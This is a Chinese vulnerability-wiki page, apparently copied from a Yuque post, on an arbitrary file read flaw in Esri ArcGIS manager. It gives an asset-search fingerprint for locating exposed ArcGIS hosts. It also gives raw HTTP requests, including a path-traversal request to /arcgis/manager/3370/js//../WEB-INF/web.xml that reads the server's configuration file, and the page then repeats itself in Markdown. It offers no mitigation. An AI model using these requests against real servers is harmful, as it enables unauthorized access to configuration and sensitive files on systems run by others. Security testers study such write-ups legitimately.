fofamini-wiki

登录白背景

源码

ArcGIS manager存在任意文件读取漏洞

一、漏洞简介

Esri ArcGIS Enterprise是美国环境系统研究所（Esri）公司的一套GIS（地理信息系统）的基础软件系统。该系统支持制图和可视化、分析以及数据管理等。ArcGIS产品线为用户提供一个可伸缩的，全面的GIS平台。ArcObjects包含了许多的可编程组件，从细粒度的对象（例如单个的几何对象）到粗粒度的对象（例如与现有ArcMap文档交互的地图对象）涉及面极广，这些对象为开发者集成了全面的GIS功能。ArcGIS manager存在任意文件读取漏洞。

二、影响版本

ArcGIS

三、资产测绘

huterapp.name=="ArcGIS"
特征

四、漏洞复现

GET /arcgis/ HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: rsaPublicKey=null; JSESSIONID=B469B7A5C37F7DA97D60C11D6656B2FD
Upgrade-Insecure-Requests: 1

GET /arcgis/manager/3370/js//../WEB-INF/web.xml HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: rsaPublicKey=null; JSESSIONID=B469B7A5C37F7DA97D60C11D6656B2FD
Upgrade-Insecure-Requests: 1

原文: https://www.yuque.com/xiaokp7/ocvun2/uoq1dszafttim0de

# ArcGIS manager存在任意文件读取漏洞

# 一、漏洞简介
Esri ArcGIS Enterprise是美国环境系统研究所（Esri）公司的一套GIS（地理信息系统）的基础软件系统。该系统支持制图和可视化、分析以及数据管理等。ArcGIS产品线为用户提供一个可伸缩的，全面的GIS平台。ArcObjects包含了许多的可编程组件，从细粒度的对象（例如单个的几何对象）到粗粒度的对象（例如与现有ArcMap文档交互的地图对象）涉及面极广，这些对象为开发者集成了全面的GIS功能。ArcGIS manager存在任意文件读取漏洞。

# 二、影响版本

- ArcGIS

# 三、资产测绘

- huter`app.name=="ArcGIS"`
- 特征

![image.png](./img/XM-VP6qh3OlfdhqE/1704280171524-52f1727b-8dcb-4b6c-ae50-e7712f14a0d9-137130.png)

# 四、漏洞复现
```
GET /arcgis/ HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: rsaPublicKey=null; JSESSIONID=B469B7A5C37F7DA97D60C11D6656B2FD
Upgrade-Insecure-Requests: 1
```
![image.png](./img/XM-VP6qh3OlfdhqE/1704280276742-898dfde4-683c-4833-8654-f21e2cbb08b1-345132.png)
```
GET /arcgis/manager/3370/js//../WEB-INF/web.xml HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: rsaPublicKey=null; JSESSIONID=B469B7A5C37F7DA97D60C11D6656B2FD
Upgrade-Insecure-Requests: 1
```
![image.png](./img/XM-VP6qh3OlfdhqE/1704280325987-ab1a9134-3b80-419a-b002-f671c3799c83-307045.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uoq1dszafttim0de>